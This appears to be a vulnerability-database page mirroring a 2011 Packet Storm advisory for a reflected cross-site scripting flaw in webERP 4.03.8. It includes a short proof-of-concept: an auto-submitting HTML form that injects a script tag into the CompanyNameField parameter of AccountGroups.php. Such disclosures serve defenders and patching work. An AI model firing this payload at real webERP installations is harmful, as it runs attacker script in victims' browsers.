Lucene search
K

webERP 4.03.08 Cross Site Scripting

🗓️ 25 Apr 2011 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

webERP 4.03.08 Cross Site Scripting vulnerability discovere

Code
`<!------------------------------------------------------------------------  
# Software................webERP 4.03.8  
# Vulnerability...........Reflected Cross-site Scripting  
# Threat Level............Low (1/5)  
# Download................http://www.weberp.org/  
# Discovery Date..........4/25/2011  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................AutoSec Tools  
# Site....................http://www.autosectools.com/  
# Email...................John Leitch <[email protected]>  
# ------------------------------------------------------------------------  
#   
#   
# --Description--  
#   
# A reflected cross-site scripting vulnerability in webERP 4.03.8 can be  
# exploited to execute arbitrary JavaScript.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://localhost/weberp/AccountGroups.php">  
<input type="hidden" name="CompanyNameField" value="<script>alert(0)</script>" />  
<input type="hidden" name="UserNameEntryField" value="" />   
<input type="hidden" name="Language" value="" />   
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation